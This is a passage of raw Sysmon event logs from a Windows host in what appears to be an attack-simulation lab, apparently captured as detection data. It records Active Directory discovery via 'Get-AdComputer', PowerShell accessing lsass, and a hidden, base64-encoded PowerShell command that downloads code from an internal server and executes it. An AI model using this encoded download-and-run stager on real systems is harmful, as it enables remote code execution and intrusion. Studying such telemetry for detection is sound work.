18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4F9B-613A-7190-03000000C801}5704532C:\Windows\system32\cmd.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.710{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe Get-AdComputer -Filter *C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-4F9B-613A-7190-03000000C801}5704C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe Get-AdComputer -Filter * 10341000x800000000000000035085783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F9B-613A-7190-03000000C801}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-4F9B-613A-7190-03000000C801}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F9B-613A-7190-03000000C801}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.702{B81B27B7-4F9B-613A-7190-03000000C801}5704C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe Get-AdComputer -Filter *C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035085810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:00.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6972D312EFCE322AB83292F669187F48,SHA256=73ECF023A1426B0426FD68D4EF61EBE8CEF4D5A067DB8A6619F7E5E1E106A997,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:00.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45D091CC44F585EDEA59AF08ABC4CA20,SHA256=D8A960BD26AF76A7689890A70F3A57E219EA02E205567325764C4976684D47FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:00.725{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7F5FBBC3510689D5DC2BC6600D538CD5,SHA256=B4EB36EAAC839BA74A818F8432D167AD92D3CEDF9DAA69A90653FD6701C668E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:00.645{B81B27B7-4F9B-613A-7290-03000000C801}3876ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:24.155{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56765-false10.0.1.12-8000- 23542300x800000000000000035085805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:00.429{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A408EE6C4F442AA0D69E7B67E271302,SHA256=0F5B52C36EAB2FE554978FE6B1C36519E64580E576AD97B17822F54E43D7FCCD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:00.281{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035085803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:00.150{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 734700x800000000000000035085802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:00.066{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035085801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:00.066{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x800000000000000035085815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:26.314{00000000-0000-0000-0000-000000000000}3876<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56769-false10.0.1.14WIN-DC-1289389- 354300x800000000000000035085814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:26.184{00000000-0000-0000-0000-000000000000}3876<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56768-false10.0.1.14WIN-DC-1289389- 354300x800000000000000035085813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:26.091{00000000-0000-0000-0000-000000000000}3876<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56767-false10.0.1.14WIN-DC-1289389- 354300x800000000000000035085812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:25.707{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56766-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:01.068{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649CA7B26C1D568F7D2F6DD3FDEEDDDC,SHA256=5B55E8E413F2DCCFF31699419BC3DF53AB47B19162312A0618D2AC3E0C154192,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:26.996{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56770-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:02.086{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=896B82DC2D2FF49C4F03C20DE955A180,SHA256=66F52809CA74B11C772ADF5062386EE63433DCC8E483A815DD6784A67683266D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000035085817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:26.090{00000000-0000-0000-0000-000000000000}3876win-dc-128.attackrange.local0::ffff:10.0.1.14;<unknown process> 23542300x800000000000000035085816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:02.036{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0E7555FA9C313E5868F52E1DD5410DAE,SHA256=334419ABD31B61583A5354E5BA8AB7A2BEF8988946683E17E1ECD66531452BF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:03.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F154699E87FCE1466AA5D2E1C8C56234,SHA256=8C9F4BBA56E248F30A673D6405E01045A324FDCE4DCBD588E091A8270B863B90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:04.318{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE331F248BC9784817E69B14CFD43E74,SHA256=03FC36F1D4E4A3799F679D2360DF319245A484847007580F023F5FA65DE1C3C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:30.109{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56771-false10.0.1.12-8000- 23542300x800000000000000035085822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:05.348{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 